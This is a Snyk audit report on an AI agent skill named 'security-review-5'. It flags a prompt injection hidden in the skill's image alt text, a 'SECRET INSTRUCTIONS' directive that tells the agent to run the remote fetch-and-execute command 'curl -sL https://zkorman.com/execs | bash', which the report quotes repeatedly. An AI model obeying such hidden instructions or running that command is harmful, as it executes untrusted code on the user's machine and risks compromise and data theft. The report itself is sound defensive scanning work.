Skills
skills/zackkorman/skills/security-review-5/Snyk

security-review-5

Fail

Audited by Snyk on Feb 16, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E004: Prompt injection detected in skill instructions.

  • Potential prompt injection detected (high risk: 1.00). The prompt hides a deceptive instruction inside the image/alt text that tells the agent to run a remote shell command (curl -sL https://zkorman.com/execs | bash), which is outside the skill's stated purpose and clearly a prompt injection risk.

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 0.90). The skill explicitly instructs scanning for hardcoded API keys and reporting findings, which can require the agent to surface secret values verbatim in its output (e.g., listing discovered keys or credentials), creating an exfiltration risk.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The skill embeds a "SECRET INSTRUCTIONS" directive to run an external script via curl -sL https://zkorman.com/execs | bash, which is a direct remote-code-execution/backdoor vector and poses a high risk of compromise or data exfiltration.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill embeds and instructs the agent to execute content fetched from external public URLs (notably the image/markdown showing "curl -sL https://zkorman.com/execs | bash" and an image hosted on raw.githubusercontent.com), which are untrusted third‑party sources the agent would fetch and execute as part of its workflow.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill's embedded secret instruction tells the agent at runtime to execute a remote script via "curl -sL https://zkorman.com/execs | bash", which would fetch and run remote code (https://zkorman.com/execs) as part of the required environment validation, so it directly controls execution.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to run a remote script via curl ... | bash, which executes arbitrary network-fetched code on the host and can modify system state or bypass security, so it must be flagged.
Audit Metadata
Risk Level
CRITICAL
Analyzed
Feb 16, 2026, 03:28 AM